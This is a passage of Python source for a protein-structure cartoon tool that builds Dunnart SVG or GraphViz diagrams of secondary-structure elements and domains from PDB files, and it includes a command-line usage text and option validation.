    # but inefficiency not very important due to small number of domains/chains
# first build list of connected domains, which are ones that
# have the same chainid and the pseudo-terminus nodes have the closest
# residue sequence ids (so that if we have eg 3 domains and one chain,
# there will only be two connections, between each pair with consecutive
    # (though note not exactly consecutive, since only SSEs have nodes)
    # residue sequence numbers, not between all 3 domains).
    domcon_dict = {} # dict of {chainid: list of (domainid1, domainid2) tuples}
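    # e.g. if domains D1, D2, D3 each hold a consecutive segment of chain 'A',
    # only the (D1,D2) and (D2,D3) pairs are recorded for 'A', not (D1,D3)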
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for chain1 in ptg1.iter_chains():
min_seqnum_diff = sys.maxint
min_snd_domainid = None
for j in range(i + 1, len(ptg_list)):
ptg2 = ptg_list[j]
for chain2 in ptg2.iter_chains():
if chain1[0].get_chainid() == chain2[0].get_chainid():
if chain1[0].get_pseudo() and chain2[-1].get_pseudo():
seqnum_diff = get_int_icode(
chain1[0].get_start_res_seq())[0] - \
get_int_icode(
chain2[-1].get_end_res_seq())[0]
# print 'iii',chain1[0],chain2[-1]
elif chain1[-1].get_pseudo() and chain2[0].get_pseudo():
seqnum_diff = get_int_icode(
chain2[0].get_start_res_seq())[0] - \
get_int_icode(
chain1[-1].get_end_res_seq())[0]
# print 'jjj',chain2[0],chain1[-1]
else: # cannot have both N or both C ends psuedo-termini
assert(False)
assert(seqnum_diff >= -2) # NB can be -2 as +-1 'fake' resnum
# print 'ttt',ptg1.domainid,ptg2.domainid,seqnum_diff
if seqnum_diff < min_seqnum_diff:
min_seqnum_diff = seqnum_diff
min_snd_domainid = ptg2.domainid
if min_snd_domainid != None:
if domcon_dict.has_key(chain1[0].get_chainid()):
domcon_dict[chain1[0].get_chainid()].append(
(ptg1.domainid, min_snd_domainid))
else:
domcon_dict[chain1[0].get_chainid()] = \
[ (ptg1.domainid, min_snd_domainid) ]
# print 'zzzzz',domcon_dict
conn_list = []
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for j in range(i + 1, len(ptg_list)):
ptg2 = ptg_list[j]
for chain1 in ptg1.iter_chains():
for chain2 in ptg2.iter_chains():
assert(chain1[0].get_termtype() == 'N')
assert(chain1[-1].get_termtype() == 'C')
assert(chain2[0].get_termtype() == 'N')
assert(chain2[-1].get_termtype() == 'C')
if (chain1[0].get_chainid() == chain2[0].get_chainid() and
(ptg1.domainid, ptg2.domainid) in
domcon_dict[chain1[0].get_chainid()]):
if chain1[0].get_pseudo() and chain2[-1].get_pseudo():
                            k = len(chain2)-2
                            from_node = chain2[k]
                            while k > 0 and not from_node.get_is_positioned():
                                k -= 1
                                from_node = chain2[k]
                            k = 1
                            to_node = chain1[k]
                            while (k < len(chain1) and
                                   not to_node.get_is_positioned()):
                                k += 1
                                to_node = chain1[k]
elif chain1[-1].get_pseudo() and chain2[0].get_pseudo():
k = len(chain1) - 2
from_node = chain1[k]
while k > 0 and not from_node.get_is_positioned():
k -= 1
from_node = chain1[k]
k = 1
to_node = chain2[k]
while (k < len(chain2) and
not to_node.get_is_positioned()):
k += 1
to_node = chain2[k]
else: # cannot have both N or both C ends psuedo-termini
assert(False)
srcFlags = from_node.get_empty_port()
dstFlags = to_node.get_empty_port()
if connector_color_scheme[:6] == 'domain':
if ':' in connector_color_scheme:
linecolor = get_connector_colors(
connector_color_scheme)[1]
else:
# no colors specified; make
# interdomain connectors the last
# color in list
linecolor = DUNNART_LINE_COLORS[-1]
else: # will be overwritten later for 'chain'
if (connector_color_scheme[:4] == 'all:' or
connector_color_scheme[:9] == 'crossing:'):
linecolor=get_connector_colors(
connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
xmlid = xmlid_generator.next()
conn_list.append(PTSVGConnector(xmlid,
from_node, to_node,
srcFlags, dstFlags,
linecolor,
use_connector_arrowheads)
)
return conn_list
def recolor_connectors_chain(ptg_list, interdomain_connector_list,
connector_color_scheme):
"""
    Redo the connector coloring in the case of 'chain' coloring
so that each chain has a different color (since with multiple domains
may have different chains in different domains, that were colored
the same color when operating one domain at a time).
Parameters:
ptg_list - list of PTGraph2 objects one per domain
        interdomain_connector_list - list of PTSVGConnector objects for
connectors between domains
connector_color_scheme - 'chain[:<color_list>]'
NOTE: modifies the color data in objects in the lists
Return value:
None
"""
assert(connector_color_scheme[:5] == 'chain')
if ':' in connector_color_scheme: # color list specified
color_list = get_connector_colors(connector_color_scheme)
else: # use default line colors list
color_list = DUNNART_LINE_COLORS
# build dictionary mapping each distinct chainid to index in list
# of line colors
chainid_colorindex_dict = {} # dict of {chainid:colorindex}
colorindex = 0
for ptg in ptg_list:
for chain in ptg.iter_chains():
chainid = chain[0].get_chainid()
if not chainid_colorindex_dict.has_key(chainid):
chainid_colorindex_dict[chainid] = colorindex
colorindex = (colorindex + 1) % len(color_list)
if verbose:
sys.stderr.write('chain colors: ' + str(chainid_colorindex_dict) +'\n')
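    # e.g. with chains 'A' and 'B' spread over the domains and at least two
    # colors in the list, chainid_colorindex_dict becomes {'A': 0, 'B': 1},
    # so the two chains' connectors end up with different colors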
# recolor each connector with its appropriate color for chain now
# intradomain connectors
for ptg in ptg_list:
for conn in ptg.svg_connector_list:
chainid = conn.src.get_chainid()
assert(conn.dest.get_chainid() == chainid) # src,dst same chain
conn.color = color_list[chainid_colorindex_dict[chainid]]
# and interdomain connectors
for conn in interdomain_connector_list:
chainid = conn.src.get_chainid()
assert(conn.dest.get_chainid() == chainid) # src,dst same chain
conn.color = color_list[chainid_colorindex_dict[chainid]]
def build_one_dunnart_svg_domain(ptg, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors=False,
use_scaling = False,
label_residue_numbers=False):
"""
    Build Dunnart SVG in the PTGraph2 object for a single domain
(already with constraints built, etc.)
Parameters:
ptg (read/write) - the PTGraph2 object to build the SVG in.
outfilename - filename for verbose message text only, not opened.
sse_label_scheme - if 'sequential' number all nodes in one sequence
                   instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
        enable_sheet_gap_rule - If True and using heuristic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'none','chain','domain'
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold'
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
        initial_xmlid - XML identifier to start at
main_sideways - if True, the 'main' part of the domain (largest sheet
or longest helix) is drawn sideways instead of vertical
main_reversed - If True, the main part (as above) is drawn reversed
(down not up, or right not left when sideways)
        interdomain_connectors - If True, do NOT make pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
                    SSEs are left to have connectors to other domains
added later. Default False.
use_scaling - if True use uniform scaling as primitive way to
remove overlaps before dunnart processing.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Return value:
None.
"""
# if this is an alpha-only domain then always use the
# distance-matrix based helix placement algorithm as the
    # heuristic ('old') algorithm requires at least one beta sheet
domain_heuristic_helix_placement = heuristic_helix_placement
if len(ptg.sheet_dict) == 0:
if heuristic_helix_placement:
sys.stderr.write('Alpha-only domain; '
'distance matrix helix placement used '
'for this domain (' + outfilename + ')\n')
domain_heuristic_helix_placement = False
if verbose:
sys.stderr.write('Building SVG for ' + outfilename)
if ptg.domainid != None:
sys.stderr.write(' domain ' + ptg.domainid + '\n')
else:
sys.stderr.write('\n')
ptg.build_dunnart_svg(sse_label_scheme,
use_connector_arrowheads,
domain_heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors,
label_residue_numbers
)
if use_scaling:
ptg.scale(SCALE_FACTOR)
def make_graphs(pdb_filename,
domain_program,
secstruct_program,
use_dot=False, use_neato=False, use_hbonds=False,
use_dunnart_auto=False,
sse_label_scheme = 'separate',
use_connector_arrowheads=False,
connector_color_scheme = 'all',
heuristic_helix_placement=False,
use_tableaucreator = True,
include_310_helices = False,
include_pi_helices = False,
write_mfiles = False,
use_pdb_secstruct = False,
sheet_shading_colors = None,
color_scheme = 'none',
enable_sheet_gap_rule = False,
use_helix_clustering = False,
helix_cluster_shading_color = None,
helix_proximity_shading_colors = None,
multidomain_cartoon = True,
interdomain_connectors = False,
use_scaling = False,
write_pmlfile = False,
orig_pdbfilename = None,
label_residue_numbers = False):
"""
For the supplied filemame, read PDB format data from that file
and create and write out a graph for the structure read.
    Parameters:
pdb_filename - filename of PDB file to read
domain_program - domain parsing program ("none" or "ddomain"
or "cath:cath_cdf_filename") to use
secstruct_program - secondary structure definition program
('stride' or 'dssp') to use.
use_dot - If True use dot from GraphViz to make PostScript output
use_neato - If True use neato from GraphViz to make PostScript output
use_hbonds - If True make hydrogen bond graph instead of using
bridge partner information to make
sheets from strands.
use_dunnart_auto - If True use automatic graph layout in Dunnart
sse_label_scheme - if 'sequential' number all nodes in one sequence
                       instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
connector_color_scheme - 'all','none','chain','domain','crossing'
(see main)
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
use_tableaucreator - if True, use TableauCreator to get angles
between SSEs.
include_310_helices - if True, include 3_10 helices in the diagram
include_pi_helices - if True, include pi helices in the diagram
write_mfiles - if True, write MATLAB m-files to plot strands and axes.
use_pdb_secstruct - Use HELIX and SHEET cards in PDB.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
color_scheme - 'none', 'simple[:sheet_color,helixcluster_color]',
'gradient', 'sheet', 'fold'
    enable_sheet_gap_rule - If True and using heuristic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
multidomain_cartoon - If True, still build PTGraph2 for each domain
separately, but then place all domains on the
same drawing rather than one per file.
interdomain_connectors - If True and using multidomain cartoons,
draw connectors between domains instead of
                  the pseudo-terminus nodes normally used.
use_scaling - If True, use uniform scaling as primitive way of
avoiding overlaps before dunnart processing.
write_pmlfile - If True, write PyMOL .pml command file to load
structure and define SSEs according to
the method we used.
The filename of the .pml file will be PDBID.pml
where PDBID.pdb was the input file.
orig_pdbfilename - input PDB filename (may be compressed; the
pdb_filename is our uncompressed copy)
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Writes .ps or .svg files named as per description in main() below
WARNING: overwrites these .ps or .svg files
Note this handles PDB filenames both in the 1QLP.pdb or
    pdb1qlp.ent format, but in either case the output file is in the 1QLP.svg
format.
Return value: None
"""
if use_pdb_secstruct:
pdb_secstruct = ptsecstruct.read_secstruct_from_pdb_file(pdb_filename)
if pdb_secstruct == None:
sys.stderr.write('WARNING: error with HELIX or SHEET cards in PDB'
': ' + secstruct_program +
' will be used instead\n')
else:
pdb_secstruct = None
# read secondary structure and H bond information from STRIDE or DSSP,
# or only read hydrogen bond information from them if already have
# secondary structure from PDB HELIX and SHEET cards.
if secstruct_program == "stride":
secstruct = ptsecstruct.read_secstruct_from_stride(pdb_filename,
pdb_secstruct)
else:
secstruct = ptsecstruct.read_secstruct_from_dssp(pdb_filename,
pdb_secstruct)
pdb_file_basename = os.path.basename(pdb_filename)
(name,extension) = os.path.splitext(pdb_file_basename)
if extension.lower() == ".ent" and name[0].lower() == "d":
# An ASTRAL/SCOP pdbstyle file such as d1apaa_.ent,
# we will use in this case e.g. d1apaa_ as the 'pdbid'
pdbid = name
is_astral = True
else: # a regular PDB file
try:
pdbid = secstruct.pdb_id.lstrip()
except AttributeError: # no PDB id, try to use filename instead
pdbid = name
is_astral = False
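    # e.g. an ASTRAL pdbstyle file 'd1apaa_.ent' gives pdbid 'd1apaa_' with
    # is_astral True; a regular entry such as '1QLP.pdb' takes its pdbid from
    # the parsed PDB id, falling back to the filename when none is present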
# write PyMOL command file to load structure and show SSEs if requested
if write_pmlfile:
pmlfilename = pdbid + '.pml'
sys.stdout.write('writing file ' + pmlfilename + '\n')
pmlfile_fh = open(pmlfilename, 'w')
secstruct.write_pymol_sse_commands(pmlfile_fh, orig_pdbfilename)
pmlfile_fh.close()
pdb_parser = PDBParser()
pdb_struct = pdb_parser.get_structure(pdbid, pdb_filename) # parse PDB file
if is_astral:
# ASTRAL/SCOP pdbstyle file is for a single SCOP domain, so makes
# no sense to do domain decomposition
domain_list = [PTDomain(None, None)] # 'single domain' indicator
if domain_program != "none":
sys.stderr.write("WARNING: domain decomposition not run "
"as input file detected as an "
"ASTRAL/SCOP domain.\n")
else:
if domain_program == "none":
domain_list = [PTDomain(None, None)] # 'single domain' indicator
elif domain_program[0:5] == "cath:":
cdf_filename = domain_program[5:]
try:
domain_list = read_domains_from_cath_cdf_file(cdf_filename, pdbid)
except NotInCATH_Exception:
sys.stderr.write('WARNING: PDB identifier ' + pdbid +
' not found in CDF file.')
sys.stderr.write(' Treating as single domain.\n')
domain_list = [PTDomain(None, None)]
else:
domain_list = read_domains_from_ddomain(pdb_filename,
pdb_struct[0]) # TODO: model 0
# Sometimes DDOMAIN seems to give domain decompositions that do not
# make sense, i.e. have domains nested one inside the other.
# This happens for example with 2RH1. We will check for this and
# if it happens just ignore the decomposition, making a single domain.
domain_cd = build_domain_chaindict(domain_list)
if not verify_domain_disjoint(domain_list, domain_cd):
sys.stderr.write('WARNING: DDOMAIN domain decomposition is ' +
'inconsistent. Treating as single domain.\n')
domain_list = [PTDomain(None, None)]
# NOTE: if there is only one domain, we will make it a list
# with a single PTDomain with all data None, signifying a
# single domain protein with no further information. This is
# mainly because of when there are multiple chains, in which
# case the single domain is reported by DDOMAIN as having a
# different chain id for start and end. If there is a single
# domain we really don't want to do anything special, so it is
# better to just have it as a special case where no domain
# processing is done.
if len(domain_list) == 1:
domain_list = [PTDomain(None, None)]
elif len(domain_list) == 0:
# This happens if DDomain crashes for example (e.g. on 1PPJ)
sys.stderr.write("WARNING: no domain decomposition from DDOMAIN."
" Treating as single domain.\n")
domain_list = [PTDomain(None, None)]
# output the domain decomposition in a more or less conventional format
if len(domain_list) > 1:
sys.stdout.write("domain decomposition: ")
for i in range(len(domain_list)):
sys.stdout.write(str(domain_list[i]))
if i < len(domain_list) - 1:
sys.stdout.write('/')
sys.stdout.write(' (' + domain_program + ')\n')
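    # e.g. for two domains found by DDOMAIN this prints a single line of the
    # form "domain decomposition: <domain1>/<domain2> (ddomain)"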
# for SSEs that cross domain boundaries, move whole SSE to one of the domains
fixup_crossdomain_sses(secstruct, domain_list)
initial_xmlid = 1
ptg_list = [] # list of PTGraph2 objects, one for each domain
for domain in domain_list:
ptg = PTGraph2(pdb_struct, use_hbonds,
include_310_helices, include_pi_helices)
# build PTGraph2 from secondary structure and H bonds for this domain
try:
ptg.build_graph_from_secstruct(secstruct, domain)
except NoSSE_Exception:
if domain.domainid == None:
domidext = ''
else:
domidext = '-' + domain.domainid
sys.stderr.write('WARNING: No helices or strands found in domain ' +
pdbid + domidext +
': no output written\n')
continue
# find sheets as connected components & label strands
ptg.label_sheets()
        # write MATLAB m-files to plot strands in each sheet if required
if write_mfiles:
if domain.domainid == None:
domainid = "1"
else:
domainid = domain.domainid
ptg.write_sheet_mfiles(pdbid, domainid)
ptg.write_helix_mfiles(pdbid, domainid)
# build the PTDistMatrix distance maps for this domain
ptg.build_dist_matrix(domain)
# build the PTTableau tableau
ptg.build_tableau(pdbid, domain, use_tableaucreator)
# build layout constraints
ptg.build_constraints()
# label nodes with color
ptg.set_node_colors(color_scheme)
# build a graph diagram from it
if len(domain_list) > 1:
outfilename = pdbid + '-' + domain.domainid
else:
outfilename = pdbid
if (use_dot or use_neato):
# use GraphViz to make PostScript output file
dg = ptgraphviz.make_graphviz_graph(ptg)
outfilename += '.ps'
if use_dot:
progname = "dot"
else:
progname = "neato"
sys.stdout.write('writing file ' + outfilename + '\n')
dg.write_ps(outfilename,prog=progname) # or use ps2 not ps to make pdf later
elif not multidomain_cartoon:
# Build SVG objects with graph and constraints for Dunnart
build_one_dunnart_svg_domain(ptg, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
False, # main_sideways
False, # main_reversed
False, # interdomain_connectors
use_scaling,
label_residue_numbers)
ptg_list.append(ptg)
# END of iteration over domain_list
if not (use_dot or use_neato):
# write the domains out, or build each one then write them out
# for multidomain (need to do one at a time to use orientation relative
# to previous one for each one)
if connector_color_scheme[:8] == "crossing":
color_interfering_connectors = True
else:
color_interfering_connectors = False
if multidomain_cartoon:
if len(ptg_list) > 0:
outfilename = pdbid + '.svg'
sys.stdout.write('writing file ' + outfilename + '\n')
outfilehandle = open(outfilename, 'w')
write_dunnart_svg_prelude(outfilehandle, outfilename,
pdbid,
len(ptg_list),
len(domain_list),
color_interfering_connectors,
connector_color_scheme,
use_dunnart_auto)
write_dunnart_svg_domains(outfilehandle, outfilename,
ptg_list, pdb_struct,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
interdomain_connectors,
use_scaling,
label_residue_numbers)
write_dunnart_svg_conclusion(outfilehandle)
outfilehandle.close()
else:
for ptg in ptg_list: # one PTGraph2 object per domain
if len(domain_list) > 1:
outfilename = pdbid + '-' + ptg.domainid
else:
outfilename = pdbid
outfilename += '.svg'
sys.stdout.write('writing file ' + outfilename + '\n')
outfilehandle = open(outfilename, 'w')
write_dunnart_svg_prelude(outfilehandle, outfilename,
pdbid,
1,
len(domain_list),
color_interfering_connectors,
connector_color_scheme,
use_dunnart_auto)
ptg.write_dunnart_svg(outfilehandle)
write_dunnart_svg_conclusion(outfilehandle)
outfilehandle.close()
def get_min_gap_size():
"""
Return the value of the Dunnart minimum gap size
"""
global DUNNART_MIN_GAP_SIZE
return DUNNART_MIN_GAP_SIZE
def get_strand_separation():
"""
    Return the value of the Dunnart strand separation
"""
global DUNNART_STRAND_SEPARATION
return DUNNART_STRAND_SEPARATION
def set_strand_gap(gapsize):
"""
Set the value of the Dunnart strand separation and min gap size
"""
global DUNNART_STRAND_SEPARATION
global DUNNART_MIN_GAP_SIZE
DUNNART_STRAND_SEPARATION = gapsize
DUNNART_MIN_GAP_SIZE = gapsize
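# e.g. set_strand_gap(55) sets both values to the documented default of 55
# (the -g option below)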
def usage(progname):
"""
Print usage message and exit
"""
sys.stderr.write("Usage: " + progname +
" [-35acdnhrmvixgqzuwy]"
" [ -o sse_color_scheme] [ -l connector_color_scheme ] "
" [ -b sse_label_scheme ] "
" [ -k <color> ]"
" [ -g <separation> ]"
" [ -e <color_list>|auto ] [ -f <color_list>|auto ]"
" [-p domain_prog] [-t struct_prog] PDBfile\n")
sys.stderr.write(" -3 include 3_10 helices in diagram\n")
sys.stderr.write(" -5 include pi helices in diagram\n")
sys.stderr.write(" -a use Dunnart automatic graph layout\n")
sys.stderr.write(" -c use HELIX and SHEET cards from PDB file\n")
sys.stderr.write(" -d use GraphViz dot instead of Dunnart SVG\n")
sys.stderr.write(" -n use GraphViz neato instead of Dunnart SVG\n")
sys.stderr.write(" -p domain_prog : use domain_prog to parse domains\n")
sys.stderr.write(" supported is 'none' or 'ddomain' (default)\n")
sys.stderr.write(" or 'cath:cdf_file_name'\n")
sys.stderr.write(" -h graph hydrogen bonds with GraphViz\n")
sys.stderr.write(" -b SSE labelling scheme: 'none', 'sequential', 'separate' (default)\n")
sys.stderr.write(" -t struct_prog : use struct_prog define " \
"secondary structure\n")
sys.stderr.write(" supported is 'stride' or 'dssp' (default)\n")
sys.stderr.write(" -r compute angles internally, not with external TableauCreator\n")
sys.stderr.write(" -m write MATLAB M-files to plot strand axes\n")
sys.stderr.write(" -s write PyMOL .pml command file to show SSE definitions\n")
sys.stderr.write(" -v print verbose debugging messages to stderr\n")
sys.stderr.write(" -i use distance matrix information instead of\n"
" heuristic/aesthetic algorithm for helix placement\n")
sys.stderr.write(" -j only valid when not using -i. Don't align helices\n"
" on strand axes if they would push sheets apart\n")
sys.stderr.write(" -k <color> cluster helices, shading them all <color>\n")
sys.stderr.write(" -e <color_list>|auto shade nearby helix clusters the same color\n")
sys.stderr.write(" -x draw connector arrowheads\n")
sys.stderr.write(" -f <color_list>|auto shade each sheet a different color\n")
sys.stderr.write(" -g <separation> set the strand and minimum object separation\n")
sys.stderr.write(" -l connector color scheme: 'all[:<color>]' (default), "
"'chain[:<color_list>]', "
"'domain[:<intra_color>,<inter_color>']"
", crossing:<color_list>\n")
sys.stderr.write(" -o SSE color scheme: 'none' (default), "
"'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_colors>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>', "
"'gradient', 'sheet', 'fold'\n")
sys.stderr.write(" -u multidomain cartoon: place all domains in the one\n"
" SVG file instead of one per file\n")
sys.stderr.write(" -w interdomain connectors: when using multidomain\n"
" cartoons, draw connectors between domains\n"
" (only in conjunction with -u)\n")
sys.stderr.write(" -q label start and end of helices and strands with\n"
" first and last PDB residue id in that SSE.\n")
sys.stderr.write(" -y use uniform scaling to try to avoid overlaps.\n"
" Ugly and often does not work anyway, use only as\n"
" last resort\n")
sys.stderr.write(" -z print version information and exit\n")
sys.exit(1)
#-----------------------------------------------------------------------------
#
# Main
#
#-----------------------------------------------------------------------------
def main():
"""
main for ptgraph2.py
Usage: ptgraph2 [-35acdnhrimsvxguwyz] [-p domainprog] [-t structprog]
[-o ssecolorscheme ] [-l connectorcolorscheme]
            [-b sselabelscheme ] [-f <sheet_shade_color_list>]
[ -k <color> ] [ -g <separation> ]
[-e <helixcluster_shade_color_list>]
PDBfile
Output is a Dunnart file in SVG format named
pdb-X.svg where pdb is the pdb identifier
from the PDB file supplied and X is the domain identifier.
-3 specifies to include 3_10 helices in the diagram. Default is only
alpha helices.
    -5 specifies to include pi helices in the diagram. Default is only
alpha helices.
-a specifies to use Dunnart automatic graph layout (not compatible with
-d or -n or -h) (Default is to use Dunnart but not auto graph layout).
-c use the HELIX and SHEET cards from the PDB file to define secondary
structure. DSSP or STRIDE is still needed to find hydrogen bonds,
and will also be used if there are no HELIX or SHEET cards.
    -d specifies to use GraphViz dot instead of outputting SVG for Dunnart.
This outputs a PostScript file.
-n specifies to use GraphViz neato instead of outputting SVG for Dunnart.
This outputs a PostScript file.
-h specifies to use stride hydrogen bonds (from stride -h, unmodified
stride can do this) instead of the default of using bridge partners
       as determined by stride (-$ -i, requires modified stride included
with this program) and draw an H-bond graph instead of default
topological drawing.
-p specifies the domain parsing program to use. Currently supported is
"none" (no domain decomposition) or "ddomain" (default) or
"cath:cdf_file" (CATH CDF file where cdf_file is the filename).
-r disables the use of TableauCreator; relative angles of helices/strands
are computed internally.
-b specifies the SSE labelling scheme to use.
'none' SSEs have no labels
'sequential' SSEs are labelled 1,2,3, etc.
'separate' (default) Strands are labelled 1,2,3,...
and helices are labelled A,B,C,...
Only for Dunnart (not compatible with -d or -n or -h)
-t specifies the secondary structure assignment program to use.
    Currently supported are 'dssp' and 'stride'. Default 'dssp'.
-i specifies to use distance matrix information to place helices
near elements they are (3d) spatially close to, rather than
       using a heuristic to place them in easy-to-read alignments on
nearby (in sequence) strands.
-j only valid when not using -i. Don't align helices on strand axes
if they would exceed a length threshold 'pushing apart' sheets
that have been placed as neighbours.
-k <color>
only valid when not using -i. Draw sequential helices as a cluster
using tableau and distance matrix rather than aligning all on strand
axis. Shade them all <color>.
-e <color_list> only valid when using -k.
Color helix clusters the same shade when
they are nearby in 3d space (although not nearby in the diagram).
<color_list> is as specified for -o (below). If <color_list>
is specified as 'auto'
then colors are automatically selected by color gradient.
The default is to shade them all the same color specified by -k.
-m writes MATLAB M-files to plot strand carbon-alpha backbone traces
and fitted axes.
-s writes a PyMOL .pml command file to load the structure into PyMOL
and show cartoon with SSEs defined according to the method
used for our cartoon (from DSSP or STRIDE or PDB) rather than
PyMOL's internal definition.
-v specifies verbose mode: debugging output is written to stderr.
-x specifies to draw connector arrowheads indicating sequence direction
from N- to C-terminus. Only used with Dunnart SVG.
-f <color_list> specifies to shade each sheet a different color.
<color_list> is as specified for -o (below). If <color_list>
is specified as 'auto' then
colors are automatically selected by color gradient.
The default is to shade them all the same (default) color.
-g <separation> set the strand and minimum object separation value
(defaults to 55).
-l specifies the connector color scheme to use.
'all[:<color>]' (default) colors all connectors same color (default black)
'chain[:<color_list>]' colors connectors in each chain a different color
                 in order of the <color_list> or automatically chosen
if no <color_list>
'domain[:<intra_color>,<inter_color>]' colors intra-domain connectors
one color (default black) and inter-domain
connectors another (default violet).
'crossing[:<color_list>]' colors connectors that cross or closely
follow each other
different colors in order to make them easier
to distinguish. colors chosen from
<color_list> in order, or automatically
chosen if not specified.
color lists are as specified for -o (below).
-o specifies the SSE color scheme to use. 'none' is to color shapes the
default color (default).
    'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_color>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>'
colors strands in sheets
the sheet_color, helices in helix clusters
(if any) the helixcluster_color, helices the helix_color.
the color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. sheet=red,purple,#ddf02d).
If only one color is in the list then all elements of that type are
colored that color, otherwise the colors are used in turn.
    If they run out (more elements than colors in the list), the list is
    treated as circular, i.e. colors are reused from the start of the list again.
Not all types may be specified, those not specified will be colored
    default color. They need not be specified in order (keyword=value style
    parameters), delimited by '.' (no whitespace, and no ';' since that is a
    shell character which would need quoting).
'gradient' colors strands and helices along a color gradient from
N to C terminus.
'sheet' colors the strands in each sheet a different color, leaving
helices the default color.
'fold' for each sheet colors strands that are connected only by
turns (i.e. are consecutive in sequence) one color (maybe more
    than one set of such consecutive strands in sheet, a different
color for each such set), and other strands (i.e. not in a sequence)
another color(s).
-u multidomain cartoon: place all domains in the one SVG file instead of
one domain per file.
-w interdomain connectors: when using multidomain cartoons, draw connectors
between domains instead of using pseudo-terminus nodes as normally
used.
-q residue numbers: put start and end residue numbers on start and end
of helices and strands as labels
-y use uniform scaling to try to avoid overlaps before Dunnart processing
in order to try to reduce Dunnart crashes. Ugly, use as last resort.
-z print version information and exit
"""
global verbose
try:
opts, args = getopt.getopt(sys.argv[1:], "35acde:f:g:ijk:l:hmno:p:qrb:st:uwv?xyz")
except getopt.GetoptError:
usage(sys.argv[0])
# allowed args for -p option (regexp)
valid_domain_programs = [r"none", r"ddomain", r"cath:.*"]
valid_domain_programs_re = [ re.compile(re_str) for re_str in
valid_domain_programs ]
valid_secstruct_programs = ["dssp", "stride"]
valid_colorstring = r'((#[0-9A-Fa-f]{6})|([a-zA-Z0-9]+))'
valid_colorlist = valid_colorstring + '(,' + valid_colorstring + ')*'
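    # e.g. valid_colorlist matches 'red,purple,#ddf02d', the form shown in the
    # -o help text above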
valid_type = r"((sheet)|(helixcluster)|(alpha)|(pi)|(310)|(terminus))"
valid_typevalue = r"(" + valid_type + r"=" + valid_colorlist+ r")"
valid_color_options = [r"none$",
r"simple:"+ valid_typevalue +
r"(." + valid_typevalue + "){0,5}$",
r"gradient$",
r"sheet$",
r"fold$"]
valid_color_options_re = [ re.compile(re_str) for re_str in
valid_color_options ]
valid_connector_color_options = [r"all(:" + valid_colorstring + r")?$",
r"chain(:" + valid_colorlist + r")?$",
r"domain:" + valid_colorstring +
r',' + valid_colorstring + '$',
r"crossing(:" + valid_colorlist + r")?$"]
valid_connector_color_options_re = [ re.compile(re_str) for re_str in
valid_connector_color_options ]
valid_sheet_shading_colors = [ r'auto$', valid_colorlist + r'$' ]
valid_sheet_shading_colors_re = [ re.compile(re_str) for re_str in
valid_sheet_shading_colors ]
valid_helixcluster_shading_colors = [ r'auto$', valid_colorlist + r'$' ]
valid_helixcluster_shading_colors_re = [ re.compile(re_str) for re_str in
valid_helixcluster_shading_colors ]
valid_sse_label_options = ["none", "sequential", "separate"]
valid_k_option = valid_colorstring + '$'
valid_k_option_re = re.compile(valid_k_option)
use_dot = False
use_neato = False
use_hbonds = False
verbose = False # global (python globals are only 'global' to module though)
use_dunnart_auto = False
sse_label_scheme = 'separate'
use_connector_arrowheads = False
domain_program = "ddomain"
secstruct_program = "dssp"
heuristic_helix_placement = True
use_tableaucreator = True
include_310_helices = False
include_pi_helices = False
write_mfiles = False
write_pmlfile = False
use_pdb_secstruct = False
sheet_shading_colors = None
